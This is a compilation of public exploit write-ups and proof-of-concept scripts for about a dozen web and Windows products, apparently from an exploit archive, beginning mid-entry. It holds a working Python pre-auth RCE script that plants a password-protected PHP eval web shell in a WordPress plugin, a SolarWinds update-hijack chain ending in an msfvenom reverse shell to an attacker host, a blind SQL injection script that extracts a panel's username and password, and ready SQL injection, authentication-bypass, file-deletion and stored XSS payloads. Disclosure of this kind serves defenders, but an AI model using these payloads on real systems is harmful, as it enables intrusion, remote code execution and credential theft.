L8JRlfOB0CRNrs93LXbEb69DUtiBtgYVnn3dCxl8ok6TJkIwfnsYDfluyGQtvlHk9GMdwUZbTXHBf6FmJ5+0nnp434HwA0Q4RMBmqb1xXVBCP2+ZU9O0qigIeBivgzgatxw3qi6bSMt/Fn6zPrgHeFDisttaETZ3DyW9FfE75RHBOOS+qjTLunUwwu/ApwgjjBOgwtF6v9JcZh380H6jnXKXt99VEhceSazy3grAesIb3P39XVvt7NQEojdlO8GYTHi8Hko7rnwaSjhw2avvwmLlZGGo6imld3Jt7+Qu03d13oFZOuGOuOlG+JzRMdbSj+Hjd8Jz9RolOOrEKPaiFnWF4n/yxIQRnzZKAQcwpboyTE0kDki0/raVRAR9mIgf9g6AVOdeQM6tGOQ5v1m6oAyIhgA69/m3KiTZZ90GVUaaR7pmtrSxX+zZaHILXVlvnK3GZJEBoIVuwkbfskcK/fLG4IOUaHHX4MOoJZ0lYijPamlUMIwkD/bcomrOX4Og26rzgGui8kFFNkRYq8q59lhsXDasbUOOspBQNKfnKQRa0FQEWOHmEtdGmQ3IKiIHXWrlitE3UHHww0RlWqDrCIoQ9mchQ4KK40vFj3sj39bG5MsoWxE4aqCgTtkjAPLbnUameCQXDm7t19fbqjd1tqsQPo6H61AWO+sEcH1avdS7mV9DSsbRXvcb7onkQKC14AUrEngCITIP9J5Gn+OAT6cNxttnjk3zlmWWnNnloo6q8rrB34f/WTdgq+P9hLQQdraiSfnEd4WWfDf98LYAQknYIX93paZh3scf7z5C1fkfhdIEIWnLXdmAeJKC5nQMaLkgFGhlcZ8NBD8PUqZ4S1Xlii1otppvVsUGobV5Tip8Jw2Sm4JyFlB3oiA9VPdhsAisRRtVo+cplwyyqLLv9mnr5qtqdueAA72lUExI75H8wkd1BWrvSQdwDKTCMEAXwDebTHNlEADWPzSI/Cxjyb7h//QqdPJ/Yt8T+DcvUY1jPeth6tgKtY6Gz3UdqwoPNVqs0+EL2QqPaGWN+tXKAjxXKZhT3MdLRHUkjsk5sItPzR1iO++3UCYsXM8tbZQEXDx8bTos+33AZfIvHaqRWgQX9l3ZTeqbWOYkp8DPkfRfC9urTwEnYz2SjOrKihI5v7FNyk5bTBEfHYYqV4cyCDVRafFXh6HLlE4WXGHofEhew89WVnNcs3EwuruvDf5JKeczEk0yHM+RuLMTIF9S8e3aAENPscM/pqD4J/PgccRriGsyzCNlGJB7+ZtOfPqWTMwPuO/ut+uhxNqZEUozmWfg++DrddTAY7D2+toFsGfE+f4tw2uCb+p+prkTHpZ866ApH6XvFOP8DYI3oGJ00g532SeTLUF5S/ChdlfH37BYlvuQkiWxf1D9sMHTokbhHZaqdIosPCLf2FSHZ+ODvqKZ+zUpvHijLtPGSLkZmWVNO625cefzLh2nAD/YTApDLLvh2T7m+wVMXlPp17HC3q6CjO05//k= -----------------------------9604487443072642880454762058 Content-Disposition: form-data; name="__VIEWSTATEGENERATOR" 54DD7DF0 -----------------------------9604487443072642880454762058 Content-Disposition: form-data; name="__VIEWSTATEENCRYPTED" -----------------------------9604487443072642880454762058-- # Access malicious file following the link: https://localhost/uploads/General/malicious.aspx # How to fix: Update the latest version # Commit fix: https://github.com/cactusoft/kartris/commit/e9450dc1f90aa6167f1db1a6f137ea07cacb2a5c

# Exploit Title: CuteNews 2.1.2 - Arbitrary File Deletion # Date: 2020-05-08 # Author: Besim ALTINOK # Vendor Homepage: https://cutephp.com # Software Link: https://cutephp.com/click.php?cutenews_latest # Version: v2.1.2 (Maybe it affect other versions) # Tested on: Xampp # Credit: İsmail BOZKURT # Remotely: Yes Description: ------------------------------------------------------------------------ In the "Media Manager" area, users can do arbitrarily file deletion. Because the developer did not use the unlink() function as secure. So, can be triggered this vulnerability by a low user account Arbitrary File Deletion PoC -------------------------------------------------------------------------------- POST /cute/index.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 ********************************** Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 222 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/cute/index.php Cookie: CUTENEWS_SESSION=3f6a6ea7089e3a6a04b396d382308022 Upgrade-Insecure-Requests: 1 mod=media&opt=media&folder=&CKEditorFuncNum=&callback=&style=&faddm=&imgopts=&__signature_key=27966e9129793e80a70089ee1c3ebfd5-tester&__signature_dsi=0ad6659c2aa31871b0b44617cf0b1200&rm%5B%5D=../avatar.png&do_action=delete

# Title: SolarWinds MSP PME Cache Service 1.1.14 - Insecure File Permissions # Author: Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG # Date: 2020-05-06 # Vendor: https://www.solarwindsmsp.com/ # CVE: CVE-2020-12608 # GitHub: https://github.com/jensregel/Advisories/tree/master/CVE-2020-12608 # CVSSv3: 8.2 [CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H] # CWE: 276 Vulnerable version ================== SolarWinds MSP PME (Patch Management Engine) before 1.1.15 Timeline ======== 2020-04-24 Vulnerability discovered 2020-04-27 Send details to SolarWinds PSIRT 2020-04-27 SolarWinds confirmed the vulnerability 2020-05-05 SolarWinds released PME version 1.1.15 2020-05-06 Public disclosure Description =========== An error with insecure file permissions has occurred in the SolarWinds MSP Cache Service, which is part of the Advanced Monitoring Agent and can lead to code execution. The SolarWinds MSP Cache Service is typically used to get new update definition files and versions for ThirdPartyPatch.exe or SolarWinds MSP Patch Management Engine Setup. The XML file CacheService.xml in %PROGRAMDATA%\SolarWinds MSP\SolarWinds.MSP.CacheService\config\ is writable by normal users, so that the parameter SISServerURL can be changed, which controls the location of the updates. After some analysis, we were able to provide modified XML files (PMESetup_details.xml and ThirdPartyPatch_details.xml) that point to an executable file with a reverse TCP payload using our controlled SISServerURL web server for SolarWinds MSP Cache Service. Proof of Concept (PoC) ====================== As we can see, NTFS change permissions are set to CacheService.xml by default. Any user on the system who is in group users can change the file content. This is especially a big problem on terminal servers or multi-user systems. PS C:\ProgramData\SolarWinds MSP\SolarWinds.MSP.CacheService\config> icacls .\CacheService.xml .\CacheService.xml VORDEFINIERT\Benutzer:(I)(M) NT-AUTORITÄT\SYSTEM:(I)(F) VORDEFINIERT\Administratoren:(I)(F) 1. Modify CacheService.xml In the xml file, the parameter SISServerURL was adjusted, which now points to a web server controlled by the attacker. <?xml version="1.0" encoding="utf-8"?> <Configuration> <CachingEnabled>True</CachingEnabled> <ApplianceVersion>1.1.14.2223</ApplianceVersion> <CacheLocation>C:\ProgramData\SolarWinds MSP\SolarWinds.MSP.CacheService\cache</CacheLocation> <CacheSizeInMB>10240</CacheSizeInMB> <SISServerURL>https://evil-attacker.example.org</SISServerURL> <LogLevel>5</LogLevel> <Proxy></Proxy> <ProxyEncrypt>AQAAANCMnd8BFdER(...)</ProxyEncrypt> <ProxyCacheService /> <CacheFilesDeleted></CacheFilesDeleted> <CacheDeletedInBytes></CacheDeletedInBytes> <HostApplication>RMM</HostApplication> <CanBypassProxyCacheService>True</CanBypassProxyCacheService> <BypassProxyCacheServiceTimeoutSeconds>1</BypassProxyCacheServiceTimeoutSeconds> <ComponentUpdateMinutes>300</ComponentUpdateMinutes> <ComponentUpdateDelaySeconds>1</ComponentUpdateDelaySeconds> </Configuration> 2. Payload creation Generate an executable file, for example using msfvenom, that establishes a reverse tcp connection to the attacker and store it on the web server. msfvenom -p windows/x64/shell_reverse_tcp lhost=x.x.x.x lport=4444 -f exe > /tmp/solarwinds-shell.exe 3. Prepare web server Place the modified xml files (PMESetup_details.xml or ThirdPartyPatch_details.xml) on the web server in the path /ComponentData/RMM/1/, calculate MD5, SHA1 and SHA256 checksums of the executable, set correct values for SizeInBytes and increase the version. Example of PMESetup_details.xml <ComponentDetails> <Name>Patch Management Engine</Name> <Description>Patch Management Engine</Description> <MD5Checksum>7a4a78b105a1d750bc5dfe1151fb70e1</MD5Checksum> <SHA1Checksum>3d9ed6bd44b5cf70a3fed8f511d9bc9273a1feac</SHA1Checksum> <SHA256Checksum> 80579df2533d54fe9cbc87aed80884f6a97e1ccdd0443ce2bcb815ef59ed3d65 </SHA256Checksum> <SizeInBytes>7168</SizeInBytes> <DownloadURL>/ComponentData/RMM/1/solarwinds-shell.exe</DownloadURL> <FileName>solarwinds-shell.exe</FileName> <Architecture>x86,x64</Architecture> <Locale>all</Locale> <Version>1.1.14.2224</Version> </ComponentDetails> Example of ThirdPartyPatch_details.xml <ComponentDetails xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <Name>Third Party Patch</Name> <Description> Third Party Patch application for Patch Management Engine RMM v 1 and later </Description> <MD5Checksum>7a4a78b105a1d750bc5dfe1151fb70e1</MD5Checksum> <SHA1Checksum>3d9ed6bd44b5cf70a3fed8f511d9bc9273a1feac</SHA1Checksum> <SHA256Checksum> 80579df2533d54fe9cbc87aed80884f6a97e1ccdd0443ce2bcb815ef59ed3d65 </SHA256Checksum> <SizeInBytes>7168</SizeInBytes> <DownloadURL>/ComponentData/RMM/1/solarwinds-shell.exe</DownloadURL> <FileName>solarwinds-shell.exe</FileName> <Architecture>x86,x64</Architecture> <Locale>all</Locale> <Version>1.2.1.95</Version> </ComponentDetails> 4. Malicious executable download After restarting the system or reloading the CacheService.xml, the service connects to the web server controlled by the attacker and downloads the executable file. This is then stored in the path %PROGRAMDATA%\SolarWinds MSP\SolarWinds.MSP.CacheService\cache\ and %PROGRAMDATA%\SolarWinds MSP\PME\archives\. [24/Apr/2020:10:57:01 +0200] "HEAD /ComponentData/RMM/1/solarwinds-shell.exe HTTP/1.1" 200 5307 "-" "-" [24/Apr/2020:10:57:01 +0200] "GET /ComponentData/RMM/1/solarwinds-shell.exe HTTP/1.1" 200 7585 "-" "-" 5. Getting shell After a certain time the executable file is executed by SolarWinds MSP RPC Server service and establishes a connection with the rights of the system user to the attacker. [~]: nc -nlvp 4444 Listening on [0.0.0.0] (family 0, port 4444) Connection from [x.x.x.x] port 4444 [tcp/*] accepted (family 2, sport 49980) Microsoft Windows [Version 10.0.18363.778] (c) 2019 Microsoft Corporation. Alle Rechte vorbehalten. C:\WINDOWS\system32>whoami whoami nt-authority\system C:\WINDOWS\system32> Fix === There is a new PME version 1.1.15 which comes with auto-update https://success.solarwindsmsp.com/forum-post/X0D51T00007TMk6jSAD/

# Exploit Title: Wordpress Plugin Simple File List 4.2.2 - Remote Code Execution # Date: 2020-04-19 # Exploit Author: coiffeur # Vendor Homepage: https://simplefilelist.com/ # Software Link: https://wordpress.org/plugins/simple-file-list/ # Version: Wordpress Simple File List <= v4.2.2 import requests import random import hashlib import sys import os import urllib3 urllib3.disable_warnings() dir_path = '/wp-content/uploads/simple-file-list/' upload_path = '/wp-content/plugins/simple-file-list/ee-upload-engine.php' move_path = '/wp-content/plugins/simple-file-list/ee-file-engine.php' def usage(): banner = """ NAME: Wordpress v5.4 Simple File List v4.2.2, pre-auth RCE SYNOPSIS: python wp_simple_file_list_4.2.2.py <URL> AUTHOR: coiffeur """ print(banner) def generate(): filename = f'{random.randint(0, 10000)}.png' password = hashlib.md5(bytearray(random.getrandbits(8) for _ in range(20))).hexdigest() with open(f'{filename}', 'wb') as f: payload = '<?php if($_POST["password"]=="' + password + \ '"){eval($_POST["cmd"]);}else{echo "<title>404 Not Found</title><h1>Not Found</h1>";}?>' f.write(payload.encode()) print(f'[ ] File {filename} generated with password: {password}') return filename, password def upload(url, filename): files = {'file': (filename, open(filename, 'rb'), 'image/png')} datas = {'eeSFL_ID': 1, 'eeSFL_FileUploadDir': dir_path, 'eeSFL_Timestamp': 1587258885, 'eeSFL_Token': 'ba288252629a5399759b6fde1e205bc2'} r = requests.post(url=f'{url}{upload_path}', data=datas, files=files, verify=False) r = requests.get(url=f'{url}{dir_path}{filename}', verify=False) if r.status_code == 200: print(f'[ ] File uploaded at {url}{dir_path}{filename}') os.remove(filename) else: print(f'[*] Failed to upload {filename}') exit(-1) return filename def move(url, filename): new_filename = f'{filename.split(".")[0]}.php' headers = {'Referer': f'{url}/wp-admin/admin.php?page=ee-simple-file-list&tab=file_list&eeListID=1', 'X-Requested-With': 'XMLHttpRequest'} datas = {'eeSFL_ID': 1, 'eeFileOld': filename, 'eeListFolder': '/', 'eeFileAction': f'Rename|{new_filename}'} r = requests.post(url=f'{url}{move_path}', data=datas, headers=headers, verify=False) if r.status_code == 200: print(f'[ ] File moved to {url}{dir_path}{new_filename}') else: print(f'[*] Failed to move {filename}') exit(-1) return new_filename def main(url): file_to_upload, password = generate() uploaded_file = upload(url, file_to_upload) moved_file = move(url, uploaded_file) if moved_file: print(f'[+] Exploit seem to work.\n[*] Confirmning ...') datas = {'password': password, 'cmd': 'phpinfo();'} r = requests.post(url=f'{url}{dir_path}{moved_file}', data=datas, verify=False) if r.status_code == 200 and r.text.find('php') != -1: print('[+] Exploit work !') print(f'\tURL: {url}{dir_path}{moved_file}') print(f'\tPassword: {password}') if __name__ == "__main__": if (len(sys.argv) < 2): usage() exit(-1) main(sys.argv[1])

# Exploit Title: OpenZ ERP 3.6.60 - Persistent Cross-Site Scripting # Date: 2020-05-11 # Exploit Author: Vulnerability-Lab # Vendor: https://www.openz.de/ # https://www.openz.de/download.html Document Title: =============== OpenZ v3.6.60 ERP - Employee Persistent XSS Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2234 Common Vulnerability Scoring System: ==================================== 4.6 Product & Service Introduction: =============================== https://www.openz.de/ https://www.openz.de/download.html Affected Product(s): ==================== OpenZ Product: OpenZ v3.6.60 - ERP (Web-Application) Vulnerability Disclosure Timeline: ================================== 2020-05-06: Public Disclosure (Vulnerability Laboratory) Technical Details & Description: ================================ A persistent cross site scripting web vulnerability has been discovered in the official OpenZ v3.6.60 ERP web-application. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The persistent vulnerability is located in the `inpname` and `inpdescripción` parameters of the `Employee` add/register/edit module in the `menu.html` file. Remote attackers with low privileges are able to inject own malicious persistent script code as name or description. The injected code can be used to attack the frontend or backend of the web-application. The request method to inject is POST and the attack vector is located on the application-side. The attack can be triggered from low privilege user accounts against higher privilege user accounts like manager or administrators to elevate privileges via session hijacking. Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] Employee Vulnerable Input(s): [+] Mitarbeiter Name [+] Beschreibung Vulnerable File(s): [+] Menu.html Vulnerable Parameter(s): [+] inpname [+] inpdescription Proof of Concept (PoC): ======================= The persistent web vulnerability can be exploited by low privileged web application user account with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Open the openz web-application 2. Register, add or edit via profile settings the inpname & inpdescription parameter inputs 3. Edit inpname & inpdescription parameter of the profile and save the entry Note: The execute occurs on preview of the user credentials in the /org.openbravo.zsoft.smartui.Employee/SalesRepVendor8BAE92BA22C14B1487EB2B247FA4A977_Edition.html 4. Successful reproduce of the persistent web vulnerability! --- POC Session Logs [POST] --- (Inject via Add / Edit) https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/EmployeeA3D0B320B69845B386024B5FF6B1E266_Relation.html Host: localhost:8080 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Content-Type: application/x-www-form-urlencoded Content-Length: 1464 Origin: https://localhost:8080 Connection: keep-alive Referer: https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/EmployeeA3D0B320B69845B386024B5FF6B1E266_Relation.html Cookie: JSESSIONID=0692EC25BA33001B002059E182BA1544; _ga=GA1.2.403279990.1587913275; _gid=GA1.2.274268317.1587913275 Command=SAVE_EDIT_RELATION&inpLastFieldChanged=inpdescription&inpkeyColumnIdInp=&inpParentKeyColumn=&inpDirectKey=& inpKeyReferenceColumnName=&inpTableReferenceId=&inpKeyReferenceId=&autosave=N&inpnewdatasetindicator=&inpnewdataseIdVal=& inpenabledautosave=Y&inpisemployee=Y&inpistaxexempt=N&inpadClientId=C726FEC915A54A0995C568555DA5BB3C&inpaAssetId=& inpcGreetingId=&inpcBpartnerId=8BEB3E9FD5D24F9BBCF777A51D53F5AF&inpissummary=N&inprating=N&inpTableId=AC9B98C649CD4F55B37714008EE8519F& inpkeyColumnId=C_BPartner_ID&inpKeyName=inpcBpartnerId&mappingName=/org.openbravo.zsoft.smartui.Employee/ EmployeeA3D0B320B69845B386024B5FF6B1E266_Relation.html&inpwindowId=39D3CD9F77A942D690965D49106F011B& inpTabId=A3D0B320B69845B386024B5FF6B1E266&inpCommandType=EDIT&updatedTimestamp=20200426170335&inpParentOrganization=& inpadOrgId=1AF9E07685234E0A9FEC1D9B58A4876B&inpadImageId=& inpvalue=325235&inpname=>"><iframe src=evil.source><iframe></iframe></iframe>& inpdescription=>"><iframe src=evil.source><iframe></iframe></iframe>&inpimageurl=31337& inpisactive=Y&inpisinresourceplan=Y&inpapprovalamt=0,00&inpcSalaryCategoryId=&inptaxid=&inpreferenceno=& inpcBpGroupId=42691AE1D13F400AB814B70361E167C3&inpadLanguage=de_DE&inpcountry=Deutschland&inpzipcode=& inpcity=&inpcreated=26-04-2020 17:03:35&inpcreatedby=Service&inpupdated=26-04-2020 17:03:35&inpupdatedby=Service - POST: HTTP/1.1 302 Found Server: Apache/2.4.38 (Debian) Location: https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/EmployeeA3D0B320B69845B386024B5FF6B1E266_Relation.html?Command=RELATION Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 - (Execution in Listing) https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/evil.source Host: myerponline.de Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Connection: keep-alive Referer: https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/SalesRepVendor8BAE92BA22C14B1487EB2B247FA4A977_Edition.html Cookie: JSESSIONID=0692EC25BA33001B002059E182BA1544; _ga=GA1.2.403279990.1587913275; _gid=GA1.2.274268317.1587913275 - GET: HTTP/1.1 200 OK Server: Apache/2.4.38 (Debian) Content-Type: text/html;charset=utf-8 Content-Language: en Content-Length: 1110 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive PoC: Vulnerable Source (/security/Menu.html) <table width="0px" height="0px" cellspacing="0" cellpadding="0"> <tbody><tr> <td><input type="text" class="DataGrid_Table_Dummy_Input" id="grid_table_dummy_input"></td> </tr> </tbody></table> <input type="hidden" name="inpcBpartnerId" value="8BEB3E9FD5D24F9BBCF777A51D53F5AF" id="keyParent"> <div class="RelationInfoContainer"> <table class="RelationInfo"> <tbody><tr> <td class="RelationInfoTitle" id="related_info_cont">Business Partner:</td> <td class="RelationInfoContent" id="paramParentC_BPartner_ID">325235 - >"><iframe src="a"></TD> </TR> Reference(s): https://localhost:8080/ https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/ https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/Employee Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. -- VULNERABILITY LABORATORY - RESEARCH TEAM

# Exploit Title: Victor CMS 1.0 - 'post' SQL Injection # Google Dork: N/A # Date: 2020-05-09 # Exploit Author: BKpatron # Vendor Homepage: https://github.com/VictorAlagwu/CMSsite # Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip # Version: v1.0 # Tested on: Win 10 # CVE: N/A # my website: bkpatron.com # Discription: # The Victor CMS v1.0 application is vulnerable to SQL injection via the 'post' parameter on the post.php page. # vulnerable file : post.php http://localhost/CMSsite-master/post.php?post=1 Parameter: post (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: post=1 AND 2333=2333 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: post=1 AND (SELECT 4641 FROM(SELECT COUNT(*),CONCAT(0x7178787871,(SELECT (ELT(4641=4641,1))),0x717a627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: post=1 AND (SELECT 7147 FROM (SELECT(SLEEP(5)))vltp) Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: post=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7178787871,0x54487357657079447543667943786c4f7a634a654a707448516e6f6e6241674f4c4a50477164646c,0x717a627171),NULL,NULL-- PTYU [INFO] the back-end DBMS is MySQL web application technology: PHP, Apache 2.4.39, PHP 7.2.18 back-end DBMS: MySQL >= 5.0 # Proof of Concept: http://localhost/CMSsite-master/post.php?post=sqli http://localhost/CMSsite-master/post.php?post=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,CONCAT(0x7178787871,0x54487357657079447543667943786c4f7a634a654a707448516e6f6e6241674f4c4a50477164646c,0x717a627171),NULL,NULL--%20PTYU GET /CMSsite-master/post.php?post=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,CONCAT(0x7178787871,0x54487357657079447543667943786c4f7a634a654a707448516e6f6e6241674f4c4a50477164646c,0x717a627171),NULL,NULL--%20PTYU HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=gd27m8o57gcb23t7se4d4tdv1g Connection: keep-alive Upgrade-Insecure-Requests: 1 post=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,CONCAT(0x7178787871,0x54487357657079447543667943786c4f7a634a654a707448516e6f6e6241674f4c4a50477164646c,0x717a627171),NULL,NULL--%20PTYU

# Exploit Title: complaint management system 1.0 - Authentication Bypass # Google Dork: N/A # Date: 2020-05-10 # Exploit Author: BKpatron # Vendor Homepage: https://www.sourcecodester.com/php/14206/complaint-management-system.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/complaint-management-system.zip # Version: v1.0 # Tested on: Win 10 # CVE: N/A # Vulnerability: Attacker can bypass login page and access to dashboard page # vulnerable file : admin/index.php # Parameter & Payload: '=''or' # Proof of Concept: http://localhost/Complaint%20Management%20System/admin/ POST /Complaint%20Management%20System/admin/ HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 61 Referer: http://localhost/Complaint%20Management%20System/admin/ Cookie:PHPSESSID=6d1ef7ce1b4rgp44ep3iqncfn4 Connection: keep-alive Upgrade-Insecure-Requests: 1 username=%27%3D%27%27or%27&password=%27%3D%27%27or%27&submit=: undefined

# Exploit Title: LibreNMS 1.46 - 'search' SQL Injection # Google Dork:unknown # Date: 2019-09-01 # Exploit Author: Punt # Vendor Homepage: https://www.librenms.org # Software Link: https://www.librenms.org # Version:1.46 and less # Tested on:Linux and Windows # CVE: N/A #Affected Device: more than 4k found on Shodan and Censys. #Description about the bug Vunlerable script /html/ajax_serarch.php if (isset($_REQUEST['search'])) { $search = mres($_REQUEST['search']); header('Content-type: application/json'); if (strlen($search) > 0) { $found = 0; if ($_REQUEST['type'] == 'group') { include_once '../includes/device-groups.inc.php'; foreach (dbFetchRows("SELECT id,name FROM device_groups WHERE name LIKE '%".$search."%'") as $group) { if ($_REQUEST['map']) { $results[] = array( 'name' => 'g:'.$group['name'], 'group_id' => $group['id'], as you can there is a search parameter $search = mres($_REQUEST['search']); which accepts a user input using $_REQUEST[''] dbFetchRows() used to exectute sql query now lets check the mres() function the mres() fuction is located under /includes/common.php function mres($string) { return $string; // global $database_link; return mysqli_real_escape_string($database_link, $string); as you can see the mres() function call's the mysqli_real_escape_string() which can be bypassed by '%' #POC: 1st lgoin to your LibreNMS 2nd go to this /ajax_search.php?search=%27&type=group or /ajax_search.php?search=%27&type=alert-rules 3rd you will see an sql syntax error The Librenms team have applyed a patch . Thanks Punt (From Ethiopia)

import requests import time import sys wait_delay = 5 #Depending on connection delay and server speed, you may need to make this a larger number KnockString = 'g=a&w=a&b=a&d=a&p=a&m=a' #lol no integrity verification PostData = "" def rc4_crypt(data , key): S = list(range(256)) j = 0 out = [] for i in range(256): j = (j + S[i] + ord( key[i % len(key)] )) % 256 S[i] , S[j] = S[j] , S[i] i = j = 0 for char in data: i = ( i + 1 ) % 256 j = ( j + S[i] ) % 256 S[i] , S[j] = S[j] , S[i] out.append(chr(ord(char) ^ S[(S[i] + S[j]) % 256])) return ''.join(out) def brute_length(url, id): for i in range(0, 30): Injection = "\"', (IF(LENGTH((SELECT value FROM settings WHERE id='%d')) = %d, SLEEP(%d), 0)), 'a', 'a', 'a', 'a', 'a', 'a')-- -" % (id, i, wait_delay) ConnectUrl = url + '?i=' + Injection start = time.time() r = requests.post(ConnectUrl, data=PostData, headers='') end = time.time() if((end - start) >= wait_delay): return i return 0 def brute_char(url, position, id): sys.stdout.write(" ") sys.stdout.flush() for i in range(32, 127): Injection = "\"', (IF(SUBSTRING((SELECT value FROM settings WHERE id='%d'), %d, 1) = BINARY CHAR(%d), SLEEP(%d), 0)), 'a', 'a', 'a', 'a', 'a', 'a')-- -" % (id, position, i, wait_delay) ConnectUrl = url + '?i=' + Injection sys.stdout.write("\b%c" % chr(i)) sys.stdout.flush() start = time.time() r = requests.post(ConnectUrl, data=PostData, headers='') end = time.time() if((end - start) >= wait_delay): break def brute_panel(url): global KnockString, PostData PostData = 'aaaa' + rc4_crypt(KnockString, 'aaaa') print"Username: ",; sys.stdout.flush() ulen = brute_length(url, 1) for i in range(1, ulen+1): brute_char(url, i, 1) print"\nPassword: ", sys.stdout.flush() plen = brute_length(url, 2) for i in range(1, plen+1): brute_char(url, i, 2) print"" if(len(sys.argv) >= 2): brute_panel(sys.argv[1]) else: print("enter panel gate url")

# Exploit Title: ChopSlider3 Wordpress Plugin3.4 - 'id' SQL Injection # Exploit Author: SunCSR (Sun* Cyber Security Research) # Google Dork: N/A # Date: 2020-05 -12 # Vendor Homepage: https://idangero.us/ # Software Link: https://github.com/idangerous/Plugins # Version: <= 3.4 # Tested on: Ubuntu 18.04 # CVE: 2020-11530 Description: A blind SQL injection vulnerability is present in Chop Slider 3 '/wp-content/plugins/chopslider/get_script/index.php': $cs_result = $wpdb->get_row('SELECT * FROM ' . CHOPSLIDER_TABLE_NAME . ' WHERE chopslider_id =' . $id); PoC: Blind SQL injection: GET /wp-content/plugins/chopslider/get_script/index.php?id=1111111 or (SELECT sleep(10))=6868 SQLMap using: sqlmap -u ' http://localhost/wp-content/plugins/chopslider/get_script/index.php?id=1111111111' --level=5 --risk=3 sqlmap identified the following injection point(s) with a total of 17611 HTTP(s) requests: --- Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: id=-3097 OR 2236=2236 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: id=1111111111 OR SLEEP(5) --- [08:55:01] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Apache 2.4.29 back-end DBMS: MySQL >= 5.0.12

# Exploit Title: Orchard Core RC1 - Persistent Cross-Site Scripting # Google Dork: "Orchardcms" # Date: 2020-05-07 # Exploit Author: SunCSR (Sun* Cyber Security Research) # Vendor Homepage: http://www.orchardcore.net/ # Software Link: https://github.com/OrchardCMS/OrchardCore # Version: RC1 # Tested on: Windows # CVE : N/A ### Vulnerability : Persistent Cross-Site Scripting ###Describe the bug Persistent Cross-site scripting (Stored XSS) vulnerabilities in Orchard CMS - Orchard Core RC1 allow remote attackers to inject arbitrary web script or HTML via create or edit blog content. ###To Reproduce Steps to reproduce the behavior: POST /Admin/Contents/ContentTypes/BlogPost/Create HTTP/1.1 -----------------------------31063090348194141451329743365 Content-Disposition: form-data; name="ListPart.ContainerId" 4s5x3fv3qpsh7rwzvy069ykbxn -----------------------------31063090348194141451329743365 Content-Disposition: form-data; name="TitlePart.Title" Test XSS -----------------------------31063090348194141451329743365 Content-Disposition: form-data; name="AutoroutePart.Path" -----------------------------31063090348194141451329743365 Content-Disposition: form-data; name="BlogPost.Subtitle.Text" -----------------------------31063090348194141451329743365 Content-Disposition: form-data; name="MarkdownBodyPart.Source" <script>alert(document.cookie)</script> -----------------------------31063090348194141451329743365 Content-Disposition: form-data; name="submit.Publish" submit.Publish -----------------------------31063090348194141451329743365 Content-Disposition: form-data; name="__RequestVerificationToken" xxx -----------------------------31063090348194141451329743365-- ###Reference: https://github.com/OrchardCMS/OrchardCore/issues/5802 ### History ============= 2020-03-23 Issue discovered 2020-03-27 Vendor contacted 2020-04-22 Vendor response and hotfix 2020-04-22 Vendor set patch milestone to rc2

